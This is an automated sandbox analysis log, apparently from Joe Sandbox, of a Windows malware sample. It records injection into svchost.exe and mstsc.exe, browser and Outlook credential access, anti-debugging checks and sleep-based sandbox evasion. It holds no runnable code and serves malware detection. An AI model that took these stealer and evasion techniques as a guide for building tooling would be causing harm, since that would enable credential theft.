Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007C84F3 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007C8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007DB3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007EEF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007DC423 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00774FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\rP0n___87004354.exe | File created: C:\Users\user\AppData\Local\Temp\retrofits
Source: rP0n___87004354.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mstsc.exe, 00000003.00000002.3546768186.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1993003814.00000000005F4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: rP0n___87004354.exe | ReversingLabs: Detection: 73%
Source: unknown | Process created: C:\Users\user\Desktop\rP0n___87004354.exe "C:\Users\user\Desktop\rP0n___87004354.exe"
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rP0n___87004354.exe"
Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: credui.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: rP0n___87004354.exeStatic file information: File size 1638912 > 1048576
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FrywuFHvnDbLo.exe, 00000002.00000000.1729011183.0000000000DBE000.00000002.00000001.01000000.00000004.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1882941520.0000000000DBE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: rP0n___87004354.exe, 00000000.00000003.1700289327.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, rP0n___87004354.exe, 00000000.00000003.1699565720.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1713196768.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710437251.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1819913903.000000000436A000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.0000000004510000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1818285042.00000000041B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rP0n___87004354.exe, 00000000.00000003.1700289327.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, rP0n___87004354.exe, 00000000.00000003.1699565720.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1713196768.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710437251.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000003.00000003.1819913903.000000000436A000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.0000000004510000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1818285042.00000000041B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000001.00000003.1781073080.0000000008C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781207304.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1763185053.0000000006CD0000.00000004.00000001.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1764554247.0000000006E10000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mstsc.exe, 00000003.00000002.3548096253.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3546768186.0000000000582000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883295228.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2104098329.000000002E32C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mstsc.pdb source: svchost.exe, 00000001.00000003.1781073080.0000000008C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781207304.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1763185053.0000000006CD0000.00000004.00000001.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1764554247.0000000006E10000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mstsc.exe, 00000003.00000002.3548096253.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3546768186.0000000000582000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883295228.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2104098329.000000002E32C000.00000004.80000000.00040000.00000000.sdmp
            Source: rP0n___87004354.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rP0n___87004354.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rP0n___87004354.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rP0n___87004354.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rP0n___87004354.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007EC104 LoadLibraryA,GetProcAddress,0_2_007EC104
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D8538 push FFFFFF8Bh; iretd 0_2_007D853A
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0077C590 push eax; retn 0077h0_2_0077C599
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079E88F push edi; ret 0_2_0079E891
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079E9A8 push esi; ret 0_2_0079E9AA
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00798AC5 push ecx; ret 0_2_00798AD8
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079EB83 push esi; ret 0_2_0079EB85
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079EC6C push edi; ret 0_2_0079EC6E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A3A18 push ebx; retf 1_2_024A3A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A221F push ss; ret 1_2_024A2220
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A3A2E push ebx; retf 1_2_024A3A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A3A23 push ebx; retf 1_2_024A3A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024973CB push esi; ret 1_2_024973CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02493380 push eax; ret 1_2_02493382
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02494878 push edx; iretd 1_2_02494879
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A80CC push ss; iretd 1_2_024A80D7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024921FE push ecx; ret 1_2_024921FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A8E2B push esi; ret 1_2_024A8E2C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0249A623 push edi; retf 1_2_0249A62D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AE76A push ebp; retf 1_2_024AE858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AE71E push edx; iretd 1_2_024AE71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0225F pushad ; ret 1_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F027FA pushad ; ret 1_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0283D push eax; iretd 1_2_02F02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx1_2_02F309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F01368 push eax; iretd 1_2_02F01369
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045127FA pushad ; ret 3_2_045127F9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0451225F pushad ; ret 3_2_045127F9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0451283D push eax; iretd 3_2_04512858
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045409AD push ecx; mov dword ptr [esp], ecx3_2_045409B6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_001818CC push es; iretd 3_2_001818C5
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00164048 push esi; ret 3_2_0016404B
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00774A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00774A35
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007F53DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007F53DF
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00793307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00793307
            Source: C:\Users\user\Desktop\rP0n___87004354.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\rP0n___87004354.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\rP0n___87004354.exeAPI/Special instruction interceptor: Address: 3B4014C
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 9821
            Source: C:\Users\user\Desktop\rP0n___87004354.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-97729
            Source: C:\Users\user\Desktop\rP0n___87004354.exeAPI coverage: 4.3 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 4268Thread sleep count: 151 > 30
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 4268Thread sleep time: -302000s >= -30000s
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 4268Thread sleep count: 9821 > 30
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 4268Thread sleep time: -19642000s >= -30000s
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe TID: 3704Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe TID: 3704Thread sleep time: -40500s >= -30000s
            Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_007D449B
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DC75D FindFirstFileW,FindClose,0_2_007DC75D
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007DC7E8
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007DF021
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007DF17E
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007DF47F
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007D3833
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007D3B56
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007DBD48
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0017C460 FindFirstFileW,FindNextFileW,FindClose,3_2_0017C460
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00774AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00774AFE
            Source: FrywuFHvnDbLo.exe, 00000005.00000002.3547246577.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: mstsc.exe, 00000003.00000002.3546768186.0000000000582000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000008.00000002.2105767634.000002642E36E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy
            Source: C:\Users\user\Desktop\rP0n___87004354.exeAPI call chain: ExitProcess graph end nodegraph_0-96249
            Source: C:\Users\user\Desktop\rP0n___87004354.exeAPI call chain: ExitProcess graph end nodegraph_0-96323
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A76F3 LdrLoadDll,1_2_024A76F3
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E401F BlockInput,0_2_007E401F
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00773B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00773B4C
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_007A5BFC
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007EC104 LoadLibraryA,GetProcAddress,0_2_007EC104
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov ecx, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300634F mov eax, dword ptr fs:[00000030h]1_2_0300634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
